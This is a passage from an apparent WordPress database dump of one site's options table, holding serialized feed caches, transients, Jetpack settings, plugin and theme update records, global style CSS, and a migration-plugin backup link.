href=\"https://profiles.wordpress.org/whoisnegrello/\">whoisnegrello</a> · <a href=\"https://profiles.wordpress.org/skorasaurus/\">Will Skora</a> · <a href=\"https://profiles.wordpress.org/wpmakenorg/\">wpmakenorg</a> · <a href=\"https://profiles.wordpress.org/wpsoul/\">wpsoul</a> · <a href=\"https://profiles.wordpress.org/wraithkenny/\">WraithKenny</a> · <a href=\"https://profiles.wordpress.org/wslyhbb/\">wslyhbb</a> · <a href=\"https://profiles.wordpress.org/upsuper/\">Xidorn Quan</a> · <a href=\"https://profiles.wordpress.org/fierevere/\">Yui</a> · <a href=\"https://profiles.wordpress.org/dolphingg/\">Yunus Ertuğrul</a> · <a href=\"https://profiles.wordpress.org/omaeyusuke/\">yuu</a> · <a href=\"https://profiles.wordpress.org/zebulan/\">Zebulan Stanphill</a> · <a href=\"https://profiles.wordpress.org/znuff/\">znuff</a> · <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a></p>\n\n\n\n<p>By release day, 76 locales had translated 90-percent or more of WordPress 6.0 into their language. Community translators continue after a release ensuring more translations are on their way. Thank you to everyone who helps to make WordPress available in 205 languages.</p>\n\n\n\n<p>Many thanks to all of the community volunteers who contribute to the <a href=\"https://wordpress.org/support/\">support forums</a> by answering questions from WordPress users around the world.</p>\n\n\n\n<p>If contributing to WordPress appeals to you, it’s easy to learn more and get involved. Discover the different teams that come together to <a href=\"https://make.wordpress.org/\">Make WordPress</a> and explore the product roadmap on the <a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n\n\n\n<h2>The WordPress Mission &amp; You</h2>\n\n\n\n<p>WordPress is software designed for everyone, emphasizing accessibility, performance, security, and ease of use. The project believes great software should work with minimum setup, so you can focus on sharing your story, product, or services freely. The basic WordPress software is simple and predictable so you can easily get started. It also offers powerful features for growth and success.</p>\n\n\n\n<p>WordPress believes in democratizing publishing and <a href=\"https://opensource.org/osd-annotated\">the freedoms that come with open source</a>. Supporting this idea is a large community of people collaborating on and contributing to this project. The WordPress community is welcoming and inclusive. Our contributors’ passion drives the success of WordPress which, in turn, helps you reach your goals.</p>\n\n\n\n<p><a href=\"https://wordpress.org/about/\">Learn more about WordPress</a> and how you can join our community to help shape the future of the world’s most popular website platform.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2>A Release Haiku</h2>\n\n\n\n<p>Six-point-oh is here<br>Time to download and upgrade<br>Let’s pause, celebrate</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p id=\"footnote\">1&nbsp;<a href=\"https://w3techs.com/technologies/overview/content_management\">According to W3Techs as of May 5, 2022</a>. </p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"12879\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:4:\"site\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"14607090\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Thu, 20 Oct 2022 18:08:32 GMT\";s:12:\"content-type\";s:34:\"application/rss+xml; charset=UTF-8\";s:25:\"strict-transport-security\";s:11:\"max-age=360\";s:6:\"x-olaf\";s:3:\"⛄\";s:13:\"last-modified\";s:29:\"Thu, 20 Oct 2022 08:59:29 GMT\";s:4:\"link\";s:63:\"<https://wordpress.org/news/wp-json/>; rel=\"https://api.w.org/\"\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 1\";}}s:5:\"build\";s:14:\"20211221080300\";}','no'),(20021,'_transient_timeout_feed_9bbd59226dc36b9b26cd43f15694c5c3','1666332513','no'),(20019,'_site_transient_timeout_community-events-ae4cd837a7b884647c550f8494df1e45','1666332512','no'),(20020,'_site_transient_community-events-ae4cd837a7b884647c550f8494df1e45','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"130.44.228.0\";}s:6:\"events\";a:0:{}}','no'),(20064,'_site_transient_timeout_theme_roots','1666291751','no'),(20065,'_site_transient_theme_roots','a:2:{s:17:\"skt-gb-renovation\";s:7:\"/themes\";s:15:\"twentytwentytwo\";s:7:\"/themes\";}','no'),(250,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1666266849;s:7:\"checked\";a:2:{s:17:\"skt-gb-renovation\";s:6:\"pro3.0\";s:15:\"twentytwentytwo\";s:3:\"1.2\";}s:8:\"response\";a:0:{}s:9:\"no_update\";a:1:{s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.2\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.2.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),(185,'skt_complete_notify_dismissed','1','yes'),(135,'jetpack_available_modules','a:1:{s:4:\"11.4\";a:46:{s:10:\"action-bar\";s:4:\"11.4\";s:8:\"carousel\";s:3:\"1.5\";s:13:\"comment-likes\";s:3:\"5.1\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:9:\"copy-post\";s:3:\"7.0\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:16:\"google-analytics\";s:3:\"4.5\";s:12:\"google-fonts\";s:6:\"10.8.0\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:11:\"lazy-images\";s:5:\"5.6.0\";s:5:\"likes\";s:3:\"2.2\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"masterbar\";s:3:\"4.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:10:\"photon-cdn\";s:3:\"6.6\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:9:\"post-list\";s:4:\"11.3\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:13:\"related-posts\";s:3:\"2.9\";s:6:\"search\";s:3:\"5.0\";s:9:\"seo-tools\";s:3:\"4.4\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:8:\"sitemaps\";s:3:\"3.9\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:3:\"waf\";s:4:\"10.9\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";s:21:\"woocommerce-analytics\";s:3:\"8.4\";s:7:\"wordads\";s:5:\"4.5.0\";}}','yes'),(136,'jetpack_sync_settings_disable','0','yes'),(137,'jetpack_connection_active_plugins','a:1:{s:7:\"jetpack\";a:1:{s:4:\"name\";s:7:\"Jetpack\";}}','yes'),(142,'_transient_jetpack_autoloader_plugin_paths','a:1:{i:0;s:25:\"{{WP_PLUGIN_DIR}}/jetpack\";}','yes'),(140,'jetpack_sync_https_history_home_url','a:5:{i:0;s:4:\"http\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(139,'jetpack_options','a:3:{s:7:\"version\";s:19:\"11.2-a.5:1661125790\";s:11:\"old_version\";s:19:\"11.2-a.5:1661125790\";s:14:\"last_heartbeat\";i:1666223614;}','yes'),(141,'jetpack_sync_https_history_site_url','a:5:{i:0;s:4:\"http\";i:1;s:5:\"https\";i:2;s:5:\"https\";i:3;s:5:\"https\";i:4;s:5:\"https\";}','yes'),(143,'do_activate','0','yes'),(144,'jetpack_activated','2','yes'),(169,'finished_updating_comment_type','1','yes'),(20027,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1666332513','no'),(20028,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1666289313','no'),(20029,'_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b','1666332513','no'),(20030,'_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-2-now-available/\'>WordPress 6.1 Release Candidate 2 (RC2) Now Available</a></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/\'>WordPress 6.0.3 Security Release</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://dothewoo.io/woosesh-chat-allie-brock-daniel-espinoza/\'>Do The Woo Community: A WooSesh Chat with Allie Brock and Daniel Espinoza</a></li><li><a class=\'rsswidget\' href=\'https://poststatus.com/five-takes-on-helpful-plugin-stats-and-insights/\'>Post Status: Five takes on helpful plugin stats and insights</a></li><li><a class=\'rsswidget\' href=\'https://poststatus.com/how-to-sell-plugins-themes-and-services-on-wordpress-com/\'>Post Status: How to sell plugins, themes, and services on WordPress.com</a></li></ul></div>','no'),(20063,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:293:\"<a href=\"https://cteisys.com/wp-content/ai1wm-backups/cteisys.com-20221020-181906-xqno0t.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"cteisys.com\" download=\"cteisys.com-20221020-181906-xqno0t.wpress\"><span>Download cteisys.com</span><em>Size: 147 MB</em></a>\";}','yes'),(19342,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1666266847;s:15:\"version_checked\";s:5:\"6.0.3\";s:12:\"translations\";a:0:{}}','no'),(19344,'_site_transient_timeout_php_check_2f5acf219326a8bc5331ee302b9812f4','1666656004','no'),(19345,'_site_transient_php_check_2f5acf219326a8bc5331ee302b9812f4','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(20225,'_transient_timeout_global_styles_skt-gb-renovation','1666307404','no'),(20226,'_transient_global_styles_skt-gb-renovation','body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url(\'#wp-duotone-dark-grayscale\');--wp--preset--duotone--grayscale: url(\'#wp-duotone-grayscale\');--wp--preset--duotone--purple-yellow: url(\'#wp-duotone-purple-yellow\');--wp--preset--duotone--blue-red: url(\'#wp-duotone-blue-red\');--wp--preset--duotone--midnight: url(\'#wp-duotone-midnight\');--wp--preset--duotone--magenta-yellow: url(\'#wp-duotone-magenta-yellow\');--wp--preset--duotone--purple-green: url(\'#wp-duotone-purple-green\');--wp--preset--duotone--blue-orange: url(\'#wp-duotone-blue-orange\');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}','no'),(20010,'_transient_timeout_jetpack_https_test','1666375706','no'),(20011,'_transient_jetpack_https_test','1','no'),(20012,'_transient_timeout_jetpack_https_test_message','1666375706','no'),(20016,'_site_transient_timeout_php_check_e9a080274371e157ce748ced527522b3','1666894106','no'),(20013,'_transient_jetpack_https_test_message','','no'),(20014,'_site_transient_timeout_browser_acff52a1652901ae7e446fb41b9189b7','1666894106','no'),(20015,'_site_transient_browser_acff52a1652901ae7e446fb41b9189b7','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"106.0.0.0\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(19922,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1666266849;s:8:\"response\";a:3:{s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.66\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.66.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=2789421\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=2789421\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";s:6:\"5.2.17\";}s:33:\"defender-security/wp-defender.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/defender-security\";s:4:\"slug\";s:17:\"defender-security\";s:6:\"plugin\";s:33:\"defender-security/wp-defender.php\";s:11:\"new_version\";s:5:\"3.3.2\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/defender-security/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/defender-security.3.3.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/defender-security/assets/icon-256x256.png?rev=2746819\";s:2:\"1x\";s:70:\"https://ps.w.org/defender-security/assets/icon-128x128.png?rev=2746819\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/defender-security/assets/banner-1544x500.png?rev=2625059\";s:2:\"1x\";s:72:\"https://ps.w.org/defender-security/assets/banner-772x250.png?rev=2625059\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.2\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";s:3:\"7.2\";}s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/really-simple-ssl\";s:4:\"slug\";s:17:\"really-simple-ssl\";s:6:\"plugin\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:11:\"new_version\";s:5:\"5.3.5\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/really-simple-ssl/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/really-simple-ssl.5.3.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/really-simple-ssl/assets/icon-128x128.png?rev=1782452\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/really-simple-ssl/assets/banner-1544x500.png?rev=2594863\";s:2:\"1x\";s:72:\"https://ps.w.org/really-simple-ssl/assets/banner-772x250.png?rev=2594863\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.0.3\";s:12:\"requires_php\";s:3:\"7.2\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:8:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"5.0.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.5.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.6.4\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.6.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:67:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=2279696\";s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.9\";}s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:19:\"jetpack/jetpack.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/jetpack\";s:4:\"slug\";s:7:\"jetpack\";s:6:\"plugin\";s:19:\"jetpack/jetpack.php\";s:11:\"new_version\";s:4:\"11.4\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/jetpack/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/plugin/jetpack.11.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:60:\"https://ps.w.org/jetpack/assets/icon-256x256.png?rev=2638128\";s:2:\"1x\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=2638128\";s:3:\"svg\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=2638128\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/jetpack/assets/banner-1544x500.png?rev=2653649\";s:2:\"1x\";s:62:\"https://ps.w.org/jetpack/assets/banner-772x250.png?rev=2653649\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.9\";}s:25:\"skt-blocks/skt-blocks.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/skt-blocks\";s:4:\"slug\";s:10:\"skt-blocks\";s:6:\"plugin\";s:25:\"skt-blocks/skt-blocks.php\";s:11:\"new_version\";s:3:\